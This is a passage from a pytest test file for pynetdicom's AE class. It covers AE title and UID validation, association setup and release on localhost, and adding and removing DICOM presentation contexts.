def test_max_assoc_good(self):
"""Check AE maximum association change produces good value"""
ae = AE()
ae.maximum_associations = -10
assert ae.maximum_associations == 1
ae.maximum_associations = ["a"]
assert ae.maximum_associations == 1
ae.maximum_associations = "10"
assert ae.maximum_associations == 1
ae.maximum_associations = 0
assert ae.maximum_associations == 1
ae.maximum_associations = 5
assert ae.maximum_associations == 5
def test_max_pdu_good(self):
"""Check AE maximum pdu size change produces good value"""
ae = AE()
ae.maximum_pdu_size = -10
assert ae.maximum_pdu_size == 16382
ae.maximum_pdu_size = 0
assert ae.maximum_pdu_size == 0
ae.maximum_pdu_size = 5000
assert ae.maximum_pdu_size == 5000
def test_require_calling_aet(self):
"""Test AE.require_calling_aet"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert assoc.is_released
assert not assoc.is_established
ae.require_calling_aet = ["MYAE"]
assert ae.require_calling_aet == ["MYAE"]
assoc = ae.associate("localhost", 11112)
assert assoc.is_rejected
ae.require_calling_aet = ["PYNETDICOM"]
assert ae.require_calling_aet == ["PYNETDICOM"]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
msg = r"Invalid 'require_calling_aet' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
ae.require_calling_aet = [""]
assert ae.require_calling_aet == ["PYNETDICOM"]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_aec_bytes_deprecation(self):
"""Test warning if using bytes to set an AE title."""
ae = AE()
msg = (
r"The use of a list of bytes with 'require_calling_aet' is "
r"deprecated, use a list of ASCII str instead"
)
with pytest.warns(DeprecationWarning, match=msg):
ae.require_calling_aet = [b"BADAE", "GOODAE"]
assert ae.require_calling_aet == ["BADAE", "GOODAE"]
def test_require_called_aet(self):
"""Test AE.require_called_aet"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert assoc.is_released
assert not assoc.is_established
ae.require_called_aet = True
assert ae.require_called_aet is True
assoc = ae.associate("localhost", 11112)
assert assoc.is_rejected
assoc = ae.associate("localhost", 11112, ae_title="PYNETDICOM")
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_req_calling_aet(self):
"""Check AE require calling aet change produces good value"""
ae = AE()
ae.require_calling_aet = ["10", "asdf"]
assert ae.require_calling_aet == ["10", "asdf"]
def test_req_called_aet(self):
"""Check AE require called aet change produces good value"""
ae = AE()
assert ae.require_called_aet is False
ae.require_called_aet = True
assert ae.require_called_aet is True
ae.require_called_aet = False
assert ae.require_called_aet is False
def test_string_output(self):
"""Test string output"""
ae = AE()
ae.add_requested_context(Verification)
ae.require_calling_aet = ["something"]
ae.require_called_aet = True
assert "Explicit VR" in ae.__str__()
assert "Verification" in ae.__str__()
assert "0/10" in ae.__str__()
assert "something" in ae.__str__()
assert "Require called AE title: True" in ae.__str__()
ae.supported_contexts = StoragePresentationContexts
assert "CT Image" in ae.__str__()
ae = AE()
ae.add_requested_context(Verification)
assert "None" in ae.__str__()
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.is_established
assert "Explicit VR" in ae.__str__()
assert "Peer" in ae.__str__()
assoc.release()
assert assoc.is_released
assert not assoc.is_established
scp.shutdown()
def test_init_implementation_class(self):
"""Test the default implementation class uid"""
ae = AE()
assert ae.implementation_class_uid == PYNETDICOM_IMPLEMENTATION_UID
def test_init_implementation_version(self):
"""Test the default implementation version name"""
ae = AE()
assert ae.implementation_version_name == PYNETDICOM_IMPLEMENTATION_VERSION
def test_implementation_version(self):
"""Test implementation_version_name"""
ae = AE()
ae.implementation_version_name = None
assert ae.implementation_version_name is None
ae.implementation_version_name = " "
assert ae.implementation_version_name == " "
msg = "'implementation_version_name' must be str or None, not 'int'"
with pytest.raises(TypeError, match=msg):
ae.implementation_version_name = 1234
msg = "Invalid 'implementation_version_name' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
ae.implementation_version_name = ""
assert ae.implementation_version_name == " "
def test_implementation_class(self):
"""Test implementation_class_uid"""
ae = AE()
ae.implementation_class_uid = "12.3.4"
assert isinstance(ae.implementation_class_uid, UID)
assert ae.implementation_class_uid == UID("12.3.4")
msg = (
r"'implementation_class_uid' must be str, bytes or UID, not " r"'NoneType'"
)
with pytest.raises(TypeError, match=msg):
ae.implementation_class_uid = None
assert ae.implementation_class_uid == UID("12.3.4")
msg = r"Invalid 'implementation_class_uid' value - must not be an " r"empty str"
with pytest.raises(ValueError, match=msg):
ae.implementation_class_uid = ""
msg = r"Invalid 'implementation_class_uid' value '1.2.04'"
with pytest.raises(ValueError, match=msg):
ae.implementation_class_uid = "1.2.04"
assert ae.implementation_class_uid == UID("12.3.4")
class TestAEBadInitialisation:
def test_invalid_ae_title(self):
"""Test invalid AE.ae_title"""
msg = r"Invalid 'ae_title' value - must not consist entirely of spaces"
with pytest.raises(ValueError, match=msg):
AE(ae_title=" ")
msg = (
r"Invalid 'ae_title' value '\u200b5' "
r"- must only contain ASCII characters"
)
with pytest.raises(ValueError, match=msg):
AE(ae_title=b"\xe2\x80\x8b\x35".decode("utf8"))
msg = (
r"Invalid 'ae_title' value '1234567890ABCDEFG' "
r"- must not exceed 16 characters"
)
with pytest.raises(ValueError, match=msg):
AE(ae_title="1234567890ABCDEFG")
msg = r"Invalid 'ae_title' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
AE(ae_title="")
msg = (
r"Invalid 'ae_title' value 'TEST\\ME' - must not contain control "
r"characters or backslashes"
)
with pytest.raises(ValueError, match=msg):
AE(ae_title="TEST\\ME")
msg = r"'ae_title' must be str, not 'NoneType'"
with pytest.raises(TypeError, match=msg):
AE(ae_title=None)
class TestAE_GoodExit:
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_ae_release_assoc(self):
"""Association releases OK"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
# Test N associate/release cycles
for ii in range(5):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert not assoc.is_established
assert not assoc.is_aborted
assert assoc.is_released
assert not assoc.is_rejected
scp.shutdown()
def test_ae_aborts_assoc(self):
"""Association aborts OK"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
# Test N associate/abort cycles
for ii in range(5):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.abort()
assert not assoc.is_established
assert assoc.is_aborted
assert not assoc.is_released
assert not assoc.is_rejected
scp.shutdown()
class TestAESupportedPresentationContexts:
"""Tests for AE's presentation contexts when acting as an SCP"""
def setup(self):
self.ae = AE()
def test_add_supported_context_str(self):
"""Tests for AE.add_supported_context using str."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.context_id is None
def test_add_supported_context_sop_class(self):
"""Tests for AE.add_supported_context using SOPClass."""
self.ae.add_supported_context(RTImageStorage)
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_uid(self):
"""Tests for AE.add_supported_context using UID."""
self.ae.add_supported_context(UID("1.2.840.10008.1.1"))
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_duplicate(self):
"""Tests for AE.add_supported_context using a duplicate UID."""
self.ae.add_supported_context(UID("1.2.840.10008.1.1"))
self.ae.add_supported_context(UID("1.2.840.10008.1.1"))
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_transfer_single(self):
"""Test adding a single transfer syntax without a list"""
self.ae.add_supported_context("1.2", "1.3")
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2"
assert contexts[0].transfer_syntax == ["1.3"]
self.ae.add_supported_context("1.2", UID("1.4"))
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2"
assert contexts[0].transfer_syntax == ["1.3", "1.4"]
def test_add_supported_context_duplicate_transfer(self):
"""Test adding duplicate transfer syntaxes."""
self.ae.add_supported_context("1.2", ["1.3", "1.3"])
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2"
assert contexts[0].transfer_syntax == ["1.3"]
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context("1.2.840.10008.1.1")
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_duplicate_multi(self):
"""Tests for AE.add_supported_context using a duplicate UID."""
self.ae.add_supported_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
self.ae.add_supported_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[1:]
)
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_private_abs(self):
"""Test AE.add_supported_context with a private abstract syntax"""
self.ae.add_supported_context("1.2.3.4")
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.3.4"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_private_tran(self):
"""Test AE.add_supported_context with a private transfer syntax"""
self.ae.add_supported_context("1.2.3.4", ["1.2.3", "1.2.840.10008.1.1"])
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.3.4"
assert contexts[0].transfer_syntax == ["1.2.3", "1.2.840.10008.1.1"]
def test_add_supported_context_more_128(self):
"""Test adding more than 128 presentation contexts"""
for ii in range(300):
self.ae.add_supported_context(str(ii))
contexts = self.ae.supported_contexts
assert len(contexts) == 300
def test_supported_contexts_setter(self):
"""Test the AE.supported_contexts property setter."""
context = build_context("1.2.840.10008.1.1")
self.ae.supported_contexts = [context]
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.context_id is None
def test_supported_contexts_empty(self):
"""Test the setting supported_contexts to an empty list."""
context = build_context("1.2.840.10008.1.1")
self.ae.supported_contexts = [context]
assert len(self.ae.supported_contexts) == 1
self.ae.supported_contexts = []
assert len(self.ae.supported_contexts) == 0
def test_supported_contexts_setter_raises(self):
"""Test the AE.supported_contexts property raises if not context."""
with pytest.raises(ValueError):
self.ae.supported_contexts = ["1.2.3"]
def test_supported_contexts_sorted(self):
"""Test that the supported_contexts returns contexts in order."""
self.ae.add_supported_context("1.2.3.4")
self.ae.add_supported_context("1.2.3.5")
asyntaxes = [cntx.abstract_syntax for cntx in self.ae.supported_contexts]
assert asyntaxes == ["1.2.3.4", "1.2.3.5"]
self.ae.add_supported_context("0.1.2.3")
self.ae.add_supported_context("2.1.2.3")
asyntaxes = [cntx.abstract_syntax for cntx in self.ae.supported_contexts]
assert asyntaxes == ["0.1.2.3", "1.2.3.4", "1.2.3.5", "2.1.2.3"]
def test_supported_contexts_more_128(self):
"""Test setting supported_contexts with more than 128 contexts."""
contexts = []
for ii in range(300):
contexts.append(build_context(str(ii)))
self.ae.supported_contexts = contexts
assert len(self.ae.supported_contexts) == 300
def test_remove_supported_context_str(self):
"""Tests for AE.remove_supported_context using str."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_supported_context("1.2.840.10008.1.1")
assert len(self.ae.supported_contexts) == 0
# Test multiple
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context("1.2.840.10008.1.4", ["1.2.3.4"])
assert len(self.ae.supported_contexts) == 2
self.ae.remove_supported_context("1.2.840.10008.1.1")
assert len(self.ae.supported_contexts) == 1
for context in self.ae.supported_contexts:
assert context.abstract_syntax != "1.2.840.10008.1.1"
def test_remove_supported_context_uid(self):
"""Tests for AE.remove_supported_context using UID."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_supported_context(UID("1.2.840.10008.1.1"))
assert len(self.ae.supported_contexts) == 0
def test_remove_supported_context_sop_class(self):
"""Tests for AE.remove_supported_context using SOPClass."""
self.ae.add_supported_context(RTImageStorage)
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_supported_context(RTImageStorage)
assert len(self.ae.supported_contexts) == 0
def test_remove_supported_context_default(self):
"""Tests for AE.remove_supported_context with default transfers."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_supported_context("1.2.840.10008.1.1")
assert len(self.ae.supported_contexts) == 0
def test_remove_supported_context_single_transfer(self):
"""Tests for AE.remove_supported_context with single transfer."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_supported_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[0]
)
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
def test_remove_supported_context_partial(self):
"""Tests for AE.remove_supported_context with partial transfers."""
# Test singular
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_supported_context("1.2.840.10008.1.1", ["1.2.840.10008.1.2"])
assert len(self.ae.supported_contexts) == 1
context = self.ae.supported_contexts[0]
assert len(context.transfer_syntax) == 3
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
assert context.abstract_syntax == "1.2.840.10008.1.1"
# Test multiple
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context(RTImageStorage)
self.ae.remove_supported_context("1.2.840.10008.1.1", ["1.2.840.10008.1.2"])
assert len(self.ae.supported_contexts) == 2
context = self.ae.supported_contexts[0]
assert len(context.transfer_syntax) == 3
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert (
self.ae.supported_contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
)
def test_remove_supported_context_all(self):
"""Tests for AE.remove_supported_context with all transfers."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
# Test singular
self.ae.remove_supported_context("1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES)
assert len(self.ae.supported_contexts) == 0
# Test multiple
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context(RTImageStorage)
self.ae.remove_supported_context("1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES)
context = self.ae.supported_contexts[0]
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
def test_remove_supported_context_all_plus(self):
"""Test remove_supported_context with extra transfers"""
tsyntax = DEFAULT_TRANSFER_SYNTAXES[:]
tsyntax.append("1.2.3")
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_supported_context("1.2.840.10008.1.1", tsyntax)
assert len(self.ae.supported_contexts) == 0
def test_scu_role(self):
"""Test add_supported_context with scu_role parameter."""
self.ae.add_supported_context("1.2.3")
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.3", scu_role=None)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.3", scu_role=True)
context = self.ae.supported_contexts[0]
assert context.scu_role is True
assert context.scp_role is None
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.3", scu_role=False)
context = self.ae.supported_contexts[0]
assert context.scu_role is False
assert context.scp_role is None
def test_scu_role_update(self):
"""Test updating add_supported_context with scu_role parameter."""
self.ae.add_supported_context("1.2.3")
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scu_role=None)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scu_role=True)
context = self.ae.supported_contexts[0]
assert context.scu_role is True
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scu_role=False)
context = self.ae.supported_contexts[0]
assert context.scu_role is False
assert context.scp_role is None
def test_scu_role_raises(self):
"""Test add_supported_context raises if scu_role wrong type."""
with pytest.raises(TypeError, match=""):
self.ae.add_supported_context("1.2.3", scu_role="abc")
assert self.ae.supported_contexts == []
def test_scp_role(self):
"""Test add_supported_context with scu_role parameter."""
self.ae.add_supported_context("1.2.3")
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.3", scp_role=None)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.3", scp_role=True)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is True
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.3", scp_role=False)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is False
def test_scp_role_update(self):
"""Test updating add_supported_context with scp_role parameter."""
self.ae.add_supported_context("1.2.3")
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scp_role=None)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scp_role=True)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is True
self.ae.add_supported_context("1.2.3", scp_role=False)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is False
def test_scp_role_raises(self):
"""Test add_supported_context raises if scp_role wrong type."""
with pytest.raises(TypeError, match=""):
self.ae.add_supported_context("1.2.3", scp_role="abc")
assert self.ae.supported_contexts == []
class TestAERequestedPresentationContexts:
"""Tests for AE's presentation contexts when acting as an SCU"""
def setup(self):
self.ae = AE()
def test_add_requested_context_str(self):
"""Tests for AE.add_requested_context using str."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.context_id is None
def test_add_requested_context_sop_class(self):
"""Tests for AE.add_requested_context using SOPClass."""
self.ae.add_requested_context(RTImageStorage)
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_requested_context_uid(self):
"""Tests for AE.add_requested_context using UID."""
self.ae.add_requested_context(UID("1.2.840.10008.1.1"))
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_requested_context_duplicate(self):
"""Test AE.add_requested_context using a duplicate UID."""
self.ae.add_requested_context(UID("1.2.840.10008.1.1"))
self.ae.add_requested_context(UID("1.2.840.10008.1.1"))
contexts = self.ae.requested_contexts
assert len(contexts) == 2
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert contexts[1].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_requested_context_duplicate_multi(self):
"""Tests for AE.add_requested_context using a duplicate UID."""
self.ae.add_requested_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
self.ae.add_requested_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[1:]
)
contexts = self.ae.requested_contexts
assert len(contexts) == 2
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == [DEFAULT_TRANSFER_SYNTAXES[0]]
assert contexts[1].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
def test_add_supported_context_transfer_single(self):
"""Test adding a single transfer syntax without a list"""
self.ae.add_requested_context("1.2", "1.3")
contexts = self.ae.requested_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2"
assert contexts[0].transfer_syntax == ["1.3"]
self.ae.add_requested_context("1.2", UID("1.4"))
contexts = self.ae.requested_contexts
assert len(contexts) == 2
assert contexts[1].abstract_syntax == "1.2"
assert contexts[1].transfer_syntax == ["1.4"]
def test_add_requested_context_duplicate_transfer(self):
"""Test add_requested_context using duplicate transfer syntaxes"""
self.ae.add_requested_context("1.2", ["1.3", "1.3"])
contexts = self.ae.requested_contexts
assert contexts[0].transfer_syntax == ["1.3"]
def test_add_requested_context_private_abs(self):
"""Test AE.add_requested_context with a private abstract syntax"""
self.ae.add_requested_context("1.2.3.4")
contexts = self.ae.requested_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.3.4"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_requested_context_private_tran(self):
"""Test AE.add_requested_context with a private transfer syntax"""
self.ae.add_requested_context("1.2.3.4", ["1.2.3", "1.2.840.10008.1.1"])
contexts = self.ae.requested_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.3.4"
assert contexts[0].transfer_syntax == ["1.2.3", "1.2.840.10008.1.1"]
def test_add_requested_context_more_128_raises(self):
"""Test adding more than 128 presentation contexts"""
for ii in range(128):
self.ae.add_requested_context(str(ii))
assert len(self.ae.requested_contexts) == 128
with pytest.raises(ValueError):
self.ae.add_requested_context("129")
assert len(self.ae.requested_contexts) == 128
def test_requested_contexts_setter(self):
"""Test the AE.requested_contexts property setter."""
context = build_context("1.2.840.10008.1.1")
self.ae.requested_contexts = [context]
contexts = self.ae.requested_contexts
assert len(contexts) == 1
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.context_id is None
def test_requested_contexts_empty(self):
"""Test the setting requested_contexts to an empty list."""
context = build_context("1.2.840.10008.1.1")
self.ae.requested_contexts = [context]
assert len(self.ae.requested_contexts) == 1
self.ae.requested_contexts = []
assert len(self.ae.requested_contexts) == 0
def test_requested_contexts_setter_raises(self):
"""Test the AE.requested_contexts property raises if not context."""
with pytest.raises(ValueError):
self.ae.requested_contexts = ["1.2.3"]
def test_requested_contexts_not_sorted(self):
"""Test that requested_contexts returns contexts in supplied order."""
self.ae.add_requested_context("1.2.3.4")
self.ae.add_requested_context("1.2.3.5")
asyntaxes = [cntx.abstract_syntax for cntx in self.ae.requested_contexts]
assert asyntaxes == ["1.2.3.4", "1.2.3.5"]
self.ae.add_requested_context("0.1.2.3")
self.ae.add_requested_context("2.1.2.3")
asyntaxes = [cntx.abstract_syntax for cntx in self.ae.requested_contexts]
assert asyntaxes == ["1.2.3.4", "1.2.3.5", "0.1.2.3", "2.1.2.3"]
def test_requested_contexts_more_128(self):
"""Test setting requested_contexts with more than 128 contexts."""
contexts = []
for ii in range(128):
contexts.append(build_context(str(ii)))
self.ae.requested_contexts = contexts
assert len(self.ae.requested_contexts) == 128
contexts.append(build_context("129"))
with pytest.raises(ValueError):
self.ae.requested_contexts = contexts
def test_remove_requested_context_str(self):
"""Tests for AE.remove_requested_context using str."""
# Test singular
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 0
# Test multiple
self.ae.add_requested_context("1.2.840.10008.1.1")
self.ae.add_requested_context("1.2.840.10008.1.1", ["1.2.3.4"])
self.ae.add_requested_context("1.2.840.10008.1.4", ["1.2.3.4"])
assert len(self.ae.requested_contexts) == 3
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 1
for context in self.ae.requested_contexts:
assert context.abstract_syntax != "1.2.840.10008.1.1"
def test_remove_requested_context_uid(self):
"""Tests for AE.remove_requested_context using UID."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_requested_context(UID("1.2.840.10008.1.1"))
assert len(self.ae.requested_contexts) == 0
def test_remove_requested_context_sop_class(self):
"""Tests for AE.remove_requested_context using SOPClass."""
self.ae.add_requested_context(RTImageStorage)
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_requested_context(RTImageStorage)
assert len(self.ae.requested_contexts) == 0
def test_remove_requested_context_default(self):
"""Tests for AE.remove_requested_context with default transfers."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 0
def test_remove_requested_context_single(self):
"""Tests for AE.remove_requested_context with single transfer."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_requested_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[0]
)
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
def test_remove_requested_context_partial(self):
"""Tests for AE.remove_supported_context with partial transfers."""
# Test singular
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_requested_context("1.2.840.10008.1.1", ["1.2.840.10008.1.2"])
assert len(self.ae.requested_contexts) == 1
context = self.ae.requested_contexts[0]
assert len(context.transfer_syntax) == 3
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
assert context.abstract_syntax == "1.2.840.10008.1.1"
